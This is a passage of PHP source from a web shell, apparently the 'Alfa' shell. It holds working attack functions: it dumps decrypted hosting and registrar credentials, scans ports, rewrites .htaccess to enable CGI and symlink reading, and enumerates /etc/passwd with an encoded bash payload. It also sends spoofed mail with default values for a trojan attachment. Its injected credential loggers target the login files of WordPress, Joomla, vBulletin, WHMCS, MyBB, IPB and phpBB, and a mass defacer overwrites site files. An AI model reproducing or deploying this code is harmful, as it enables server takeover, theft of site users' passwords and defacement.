                echo "<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>{$username}</td></tr></b>";
                echo "<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>{$password}</td></tr></b>";
                echo "</table><br><br></center>";
            }
            $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars");
            $num1 = @mysqli_num_rows($query1);
            if ($num1 > 0) {
                for ($i = 0; $i <= $num1 - 1; $i++) {
                    $v = mysqli_fetch_array($query1);
                    $registrar = $v['registrar'];
                    $setting = $v['setting'];
                    $value = decrypt($v['value'], $cc_encryption_hash);
                    if ($value == "") {
                        $value = 0;
                    }
                    echo "<center>Domain Reseller <br><center>";
                    echo "<center><table border='1'>";
                    echo "<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>{$registrar}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>{$setting}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>{$value}</td></tr></b>";
                    echo "</table><br><br></center>";
                }
            }
        } else {
            __alert('<font color="red">tblservers is Empty...!</font>');
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaportscanner()
{
    alfahead();
    echo "<div class=header><center><p><div class=\"txtfont_header\">| Port Scaner |</div></p>\n<form action=\"\" method=\"post\" onsubmit=\"g('portscanner',null,null,this.start.value,this.end.value,this.host.value); return false;\">\n<input type=\"hidden\" name=\"y\" value=\"phptools\">\n<div class=\"txtfont\">Host: </div> <input id=\"text\" type=\"text\" name=\"host\" value=\"localhost\"/>\n<div class=\"txtfont\">Port start: </div> <input id=\"text\" size=\"5\" type=\"text\"  name=\"start\" value=\"80\"/>\n<div class=\"txtfont\">Port end: </div> <input id=\"text\" size=\"5\" type=\"text\" name=\"end\" value=\"80\"/> <input type=\"submit\" value=\" \" />\n</form></center><br>";
    $start = strip_tags($_POST['alfa2']);
    $end = strip_tags($_POST['alfa3']);
    $host = strip_tags($_POST['alfa4']);
    if (isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])) {
        echo __pre();
        $packetContent = "GET / HTTP/1.1\r\n\r\n";
        if (ctype_xdigit($packetContent)) {
            $packetContent = @pack("H*", $packetContent);
        } else {
            $packetContent = str_replace(array("\r", "\n"), "", $packetContent);
            $packetContent = str_replace(array("\\r", "\\n"), array("\r", "\n"), $packetContent);
        }
        for ($i = $start; $i <= $end; $i++) {
            $sock = @fsockopen($host, $i, $errno, $errstr, 3);
            if ($sock) {
                stream_set_timeout($sock, 5);
                fwrite($sock, $packetContent . "\r\n\r\n\0");
                $counter = 0;
                $maxtry = 1;
                $bin = "";
                do {
                    $line = fgets($sock, 1024);
                    if (trim($line) == "") {
                        $counter++;
                    }
                    $bin .= $line;
                } while ($counter < $maxtry);
                fclose($sock);
                echo "<center><p>Port <font style='color:#DE3E3E'>{$i}</font> is open</p>";
                echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>";
            }
            flush();
        }
    }
    echo "</div>";
    alfafooter();
}
function alfacgihtaccess($m, $d = '', $symname = false)
{
    $readme = "";
    if ($symname) {
        $readme = "\nReadmeName " . trim($symname);
    }
    if ($m == 'cgi') {
        $code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
    } elseif ($m == 'sym') {
        $code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
    } elseif ($m == 'shtml') {
        $code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
    }
    @__write_file($d . '.htaccess', $code);
}
function alfabasedir()
{
    alfahead();
    echo "<div class=header>\n<center><p><div class=\"txtfont_header\">| Open Base Dir |</div></p></center>";
    $passwd = _alfa_file('/etc/passwd');
    if (is_array($passwd)) {
        $users = array();
        $makepwd = alfaMakePwd();
        $basedir = @ini_get('open_basedir');
        $safe_mode = @ini_get('safe_mode');
        if (_alfa_can_runCommand(true, false) && ($basedir || $safe_mode)) {
            $bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
            alfaWriteTocgiapi("basedir.alfa", $bash);
            $bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa " . $makepwd, false, true, true);
            $users = json_decode($bash_users, true);
            $x = count($users);
            if ($x >= 2) {
                array_pop($users);
                --$x;
            }
        }
        if (!$basedir && !$safe_mode) {
            $x = 0;
            foreach ($passwd as $str) {
                $pos = strpos($str, ':');
                $username = substr($str, 0, $pos);
                $dirz = str_replace("{user}", $username, $makepwd);
                if ($username != '') {
                    if (@is_readable($dirz)) {
                        array_push($users, $username);
                        $x++;
                    }
                }
            }
        }
        echo "<br><br>";
        echo "<b><font color=\"#00A220\">[+] Founded " . sizeof($passwd) . " entrys in /etc/passwd\n" . "<br /></font></b>";
        echo "<b><font color=\"#FFFFFF\">[+] Founded " . $x . " readable " . str_replace("{user}", "*", $makepwd) . " directories\n" . "<br /></font></b>";
        echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n<br /><br /><br /></font></b>";
        foreach ($users as $user) {
            if (empty($user)) {
                continue;
            }
            $path = str_replace("{user}", $user, $makepwd);
            echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>{$user}</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='{$path}'><input type=submit value='>>'></form><br>";
        }
    } else {
        echo "<b> <center><font color=\"#FFFFFF\">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>";
    }
    echo "<br><br></b>";
    echo "</div>";
    alfafooter();
}
function alfamail()
{
    alfahead();
    echo "<div class=header>";
    AlfaNum(8, 9, 10);
    echo "<center><p><div class=\"txtfont_header\">| Fake Mail |</div></p><form action=\"\" method=\"post\" onsubmit=\"g('mail',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,'>>',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;\">";
    $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60', 'placeholder' => true), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'] . 'trojan.exe', 'inputSize' => '60'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60'));
    create_table($table);
    echo "<p><div class=\"txtfont\">Message:</div></p><textarea rows=\"6\" cols=\"60\" name=\"mail_content\">Hi Dear Admin :)</textarea><p><input type=\"submit\" value=\" \" name=\"mail_send\" /></p></form></center>";
    if (isset($_POST['alfa4']) && $_POST['alfa4'] == '>>') {
        $mail_to = $_POST['alfa1'];
        $mail_from = $_POST['alfa2'];
        $mail_subject = $_POST['alfa3'];
        $mail_content = $_POST['alfa5'];
        $count_mail = (int) $_POST['alfa6'];
        $mail_attach = $_POST['alfa7'];
        if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) {
            if (!empty($mail_attach) && @is_file($mail_attach)) {
                $file = $mail_attach;
                $content = __read_file($file);
                $content = chunk_split(__ZW5jb2Rlcg($content));
                $uid = md5(uniqid(time()));
                $filename = basename($file);
                $headers = "From: " . $mail_from . " <" . $mail_from . ">\r\n";
                $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
                $headers .= "Reply-To: " . $mail_from . "\r\n";
                $headers .= "Content-Type: multipart/mixed; boundary=\"" . $uid . "\"\r\n\r\n";
                $headers .= "MIME-Version: 1.0\r\n";
                $headers .= "X-Mailer: php\r\n";
                $mail_content = "--" . $uid . "\r\n";
                $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
                $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
                $mail_content .= $mail_content . "\r\n\r\n";
                $mail_content .= "--" . $uid . "\r\n";
                $mail_content .= "Content-Type: application/octet-stream; name=\"" . $filename . "\"\r\n";
                $mail_content .= "Content-Transfer-Encoding: base64\r\n";
                $mail_content .= "Content-Disposition: attachment; filename=\"" . $filename . "\"\r\n\r\n";
                $mail_content .= $content . "\r\n\r\n";
                $mail_content .= "--" . $uid . "--";
            } else {
                $headers = "From: " . $mail_from . " ( " . $mail_from . " ) \r\n";
                $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) \r\n";
                $headers .= 'Reply-To: ' . $mail_from . '' . "\r\n";
                $headers .= "Content-type: text/html; charset=utf-8\r\n";
                $headers .= "MIME-Version: 1.0\r\n";
                $headers .= "X-Mailer: php\r\n";
            }
            if (empty($count_mail) || $count_mail < 1) {
                $count_mail = 1;
            }
            if (!empty($mail_from)) {
                echo __pre();
                for ($i = 1; $i <= $count_mail; $i++) {
                    if (@mail($mail_to, $mail_subject, $mail_content, $headers)) {
                        echo "<center>Sent -> {$mail_to}<br></center>";
                    }
                }
            } else {
                __alert("Invalid Mail From !");
            }
        } else {
            __alert("Invalid Mail To !");
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaziper()
{
    alfahead();
    AlfaNum(8, 9, 10);
    echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="' . htmlspecialchars($GLOBALS['cwd']) . '" size="60"/>
<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . 'alfa.zip" size="60"/>
<input type="submit" value=" " name="ziper" />
</form></center></p>';
    if (isset($_POST['alfa5']) && $_POST['alfa5'] == '>>') {
        $dirzip = $_POST['alfa3'];
        $zipfile = $_POST['alfa4'];
        if (class_exists('ZipArchive') && ($GLOBALS['sys'] != 'unix' || !_alfa_can_runCommand(true, true))) {
            $code = 'if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
            $newfunc = function ($source, $destination) {
                if (!extension_loaded('zip') || !file_exists($source)) {
                    return false;
                }
                $zip = new ZipArchive();
                if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
                    return false;
                }
                $source = str_replace('\\', '/', realpath($source));
                if (is_dir($source) === true) {
                    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
                    foreach ($files as $file) {
                        $file = str_replace('\\', '/', $file);
                        if (in_array(substr($file, strrpos($file, '/') + 1), array('.', '..'))) {
                            continue;
                        }
                        $file = realpath($file);
                        if (is_dir($file) === true) {
                            $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
                        } else {
                            if (is_file($file) === true) {
                                $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
                            }
                        }
                    }
                } else {
                    if (is_file($source) === true) {
                        $zip->addFromString(basename($source), file_get_contents($source));
                    }
                }
                return $zip->close();
            };
            if ($newfunc($dirzip, $zipfile)) {
                echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font></p></center>';
            } else {
                echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
            }
        } else {
            alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "' > /dev/null &");
            echo __pre() . '<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">' . $zipfile . '</font></b><br>Because We Executed The Command in The background !</p></center>';
        }
    }
    echo "</div>";
    alfafooter();
}
function alfacmshijacker()
{
    alfahead();
    AlfaNum(5, 6, 7, 8, 9, 10);
    echo "<div class=header><br>\n<center><div class=\"txtfont_header\">| Cms Hijacker |</div><br><br><form onSubmit=\"g('cmshijacker',null,this.cmshi.value,this.saveto.value,'>>',this.cmspath.value);return false;\" method='post'>\n<div class=\"txtfont\">CMS: <select style=\"width:100px;\" name=\"cmshi\">";
    $cm_array = array("vb" => "vBulletin", "wp" => "wordpress", "jom" => "joomla", "whmcs" => "whmcs", "mybb" => "mybb", "ipb" => "ipboard", "phpbb" => "phpbb");
    foreach ($cm_array as $key => $val) {
        echo '<option value="' . $key . '">' . $val . '</option>';
    }
    echo "</select>";
    echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
SaveTo: <input size="50" type="text" name="saveto" value="' . $GLOBALS['cwd'] . 'alfa.txt"></font>
<input type="submit" name="btn" value=" "></form></center><br>';
    $cms = $_POST['alfa1'];
    $saveto = $_POST['alfa2'];
    $cmspath = $_POST['alfa4'];
    if (!empty($cms) and !empty($saveto) and $_POST['alfa4'] and $_POST['alfa3'] == '>>') {
        echo __pre();
        alfaHijackCms($cms, $cmspath, $saveto);
    }
    echo "</div>";
    alfafooter();
}
function alfaHijackCms($cms, $cmspath, $saveto)
{
    switch ($cms) {
        case "vb":
            hijackvBulletin($cmspath, $saveto);
            break;
        case "wp":
            hijackwp($cmspath, $saveto);
            break;
        case "jom":
            hijackJoomla($cmspath, $saveto);
            break;
        case "whmcs":
            hijackWhmcs($cmspath, $saveto);
            break;
        case "mybb":
            hijackMybb($cmspath, $saveto);
            break;
        case "ipb":
            hijackIPB($cmspath, $saveto);
            break;
        case "phpbb":
            hijackPHPBB($cmspath, $saveto);
            break;
        default:
            echo "error!";
            break;
    }
}
function hijackvBulletin($path, $saveto)
{
    $code = '$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
    $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $login = $path . "/login.php";
    $class = $path . "/includes/class_bootstrap.php";
    $dologin = 'do_login_redirect();';
    $evil_login = "\t" . $code . "\n\t" . $dologin;
    $evil_class = "true";
    if (@is_file($login) and @is_writable($login) and @is_file($class) and @is_writable($class)) {
        $data_login = @file_get_contents($login);
        $data_class = @file_get_contents($class);
        if (strstr($data_login, $dologin) and strstr($data_class, $clearpw)) {
            $login_replace = str_replace($dologin, $evil_login, $data_login);
            $class_replace = str_replace($clearpw, $evil_class, $data_class);
            @file_put_contents($login, $login_replace);
            @file_put_contents($class, $class_replace);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    } else {
        hijackOutput(1);
    }
}
function hijackwp($path, $saveto)
{
    $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
    $redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $login = $path . "/wp-login.php";
    $evil_login = "\tif ( !is_wp_error(\$user) && !\$reauth ) {\n\t" . $code;
    if (@is_file($login) and @is_writable($login)) {
        $data_login = @file_get_contents($login);
        if (strstr($data_login, $redirect_wp)) {
            $login_replace = str_replace($redirect_wp, $evil_login, $data_login);
            @file_put_contents($login, $login_replace);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    } else {
        hijackOutput(1);
    }
}
function hijackJoomla($path, $saveto)
{
    $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $comp = $path . "/administrator/components/com_login/";
    if (@is_file($comp . "/login.php")) {
        $login = $comp . "/login.php";
    } elseif (@is_file($comp . "/admin.login.php")) {
        $login = $comp . "/admin.login.php";
    } else {
        $login = '';
    }
    if (@is_file($login) and @is_writable($login) and $login != '') {
        $data_login = @file_get_contents($login);
        $evil_login = $code . "\n" . $data_login;
        @file_put_contents($login, $evil_login);
        hijackOutput(0, $saveto);
    } else {
        hijackOutput(1);
    }
}
function hijackWhmcs($path, $saveto)
{
    $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $conf = $path . "/configuration.php";
    if (@is_file($conf) and @is_writable($conf)) {
        $data_conf = @file_get_contents($conf);
        if (!strstr($data_conf, '?>')) {
            $code = '?>' . $code;
        }
        $evil_conf = $data_conf . "\n" . $code;
        @file_put_contents($conf, $evil_conf);
        hijackOutput(0, $saveto);
    } else {
        hijackOutput(1);
    }
}
function hijackMybb($path, $saveto)
{
    $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
    $find = '$loginhandler->complete_login();';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $login = $path . "/member.php";
    $evil_login = "\t" . $code . "\n\t" . $find;
    if (@is_file($login) and @is_writable($login)) {
        $data_login = @file_get_contents($login);
        if (strstr($data_login, $find)) {
            $login_replace = str_replace($find, $evil_login, $data_login);
            @file_put_contents($login, $login_replace);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    } else {
        hijackOutput(1);
    }
}
function hijackIPB($path, $saveto)
{
    $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
    $find = 'unset( $member[\'plainPassword\'] );';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $login = $path . "/admin/sources/handlers/han_login.php";
    $evil_login = "\tunset( \$member['plainPassword'] );\n\t" . $code;
    if (@is_file($login) and @is_writable($login)) {
        $data_login = @file_get_contents($login);
        if (strstr($data_login, $find)) {
            $login_replace = str_replace($find, $evil_login, $data_login);
            @file_put_contents($login, $login_replace);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    } else {
        hijackOutput(1);
    }
}
function hijackPHPBB($path, $saveto)
{
    $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
    $find = 'case \'login\':';
    $code = str_replace('{saveto_path}', $saveto, $code);
    $login = $path . "/ucp.php";
    $evil_login = "\tcase 'login':\n\t" . $code;
    if (@is_file($login) and @is_writable($login)) {
        $data_login = @file_get_contents($login);
        if (strstr($data_login, $find)) {
            $login_replace = str_replace($find, $evil_login, $data_login);
            @file_put_contents($login, $login_replace);
            hijackOutput(0, $saveto);
        } else {
            hijackOutput(1);
        }
    } else {
        hijackOutput(1);
    }
}
function hijackOutput($c = 0, $p = '')
{
    echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : '<center><font color="red">Error in inject code !</font></center>';
}
function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array())
{
    if (@is_dir($dir)) {
        $files = @scandir($dir);
        foreach ($files as $key => $value) {
            $path = @realpath($dir . DIRECTORY_SEPARATOR . $value);
            if (!@is_dir($path)) {
                if ($ext != '*') {
                    $f = basename($path);
                    $f = explode('.', $f);
                    $f = end($f);
                    if ($f != $ext) {
                        continue;
                    }
                }
                if ($e == 'str') {
                    $content = @file_get_contents($path);
                    if (strpos($content, $string) !== false) {
                        echo str_replace('\\', '/', $path) . "<br>";
                    }
                } else {
                    if (strstr($value, $string)) {
                        echo str_replace('\\', '/', $path) . "<br>";
                    }
                }
                $results[] = $path;
            } elseif ($value != "." && $value != "..") {
                Alfa_StrSearcher($path, $string, $ext, $e, $results);
                $results[] = $path;
            }
        }
    }
}
function alfasearcher()
{
    alfahead();
    echo "<div class=header><center><p><div class=\"txtfont_header\">| Searcher |</div></p><h3><a href=javascript:void(0) onclick=\"g('searcher',null,'file')\">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick=\"g('searcher',null,'str')\">| Find Files By Name | </a></h3></center>";
    if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'file') {
        echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
<div class="txtfont">
Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
Dir: <input size="50" id="target" type="text" name="filename" value="' . $GLOBALS['cwd'] . '">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
        $dir = $_POST['alfa2'];
        $ext = $_POST['alfa3'];
        $method = $_POST['alfa4'];
        if ($_POST['alfa5'] == '>>') {
            echo __pre();
            if (substr($dir, -1) == '/') {
                $dir = substr($dir, 0, -1);
            }
            Alfa_Searcher($dir, trim($ext), $method);
        }
    }
    if ($_POST['alfa1'] == 'str') {
        echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
<div class="txtfont">
Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
String: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="' . $GLOBALS['cwd'] . '">
Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>';
        $dir = $_POST['alfa2'];
        $string = $_POST['alfa3'];
        $ext = $_POST['alfa5'];
        if (!empty($string) and !empty($dir) and $_POST['alfa4'] == '>>') {
            echo __pre();
            Alfa_StrSearcher($dir, $string, $ext, $_POST['alfa6']);
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaMassDefacer()
{
    alfahead();
    AlfaNum(5, 6, 7, 8, 9, 10);
    echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
    echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
	Mass dir: <input size="50" id="target" type="text" name="massdir" value="' . htmlspecialchars($GLOBALS['cwd']) . '">
	DefPage: <input size="50" type="text" name="defpage" value="' . htmlspecialchars($GLOBALS['cwd']) . '"></div> <input type="submit" name="btn" value=" "></center></p>
</form>';
    $dir = $_POST['alfa1'];
    $defpage = $_POST['alfa2'];
    $method = $_POST['alfa3'];
    $fCurrent = $GLOBALS['__file_path'];
    if ($_POST['alfa4'] == '>>') {
        if (!empty($dir)) {
            if (@is_dir($dir)) {
                if (@is_readable($dir)) {
                    if (@is_file($defpage)) {
                        if ($dh = @opendir($dir)) {
                            echo __pre();
                            while (($file = @readdir($dh)) !== false) {
                                if ($file == '..' || $file == '.') {
                                    continue;
                                }
                                $newfile = $dir . $file;
                                if ($fCurrent == $newfile) {
                                    continue;
                                }
                                if (@is_dir($newfile)) {
                                    Alfa_ReadDir($newfile, $method, $defpage);
                                } else {
                                    if (!@is_writable($newfile)) {
                                        continue;
                                    }
                                    if (!@is_readable($newfile)) {
                                        continue;
                                    }
                                    Alfa_Rewriter($newfile, $file, $defpage, $method);
                                }
                            }
                            closedir($dh);
                        } else {
                            __alert('<font color="red">Error In OpenDir...</font>');
                        }
                    } else {
                        __alert('<font color="red">DefPage File NotFound...</font>');
                    }
                } else {
                    __alert('<font color="red">Directory is not Readable...</font>');
                }
            } else {
                __alert('<font color="red">Mass Dir is Invalid Dir...</font>');
            }
        } else {
            __alert('<font color="red">Dir is Empty...</font>');
        }
    }
    echo "</div>";
    alfafooter();
}
function Alfa_ReadDir($dir, $method = '', $defpage = '')
{
    if (!@is_readable($dir)) {
        return false;
    }
    if (@is_dir($dir)) {
        if ($dh = @opendir($dir)) {
            while (($file = readdir($dh)) !== false) {
                if ($file == '..' || $file == '.') {
                    continue;
                }
                $newfile = $dir . '/' . $file;
                if (@is_readable($newfile) && @is_dir($newfile)) {
                    Alfa_ReadDir($newfile, $method, $defpage);
                }
                if (@is_file($newfile)) {
                    if (!@is_readable($newfile)) {
                        continue;
                    }
                    Alfa_Rewriter($newfile, $file, $defpage, $method);
                }
            }
            closedir($dh);
        }
    }
}
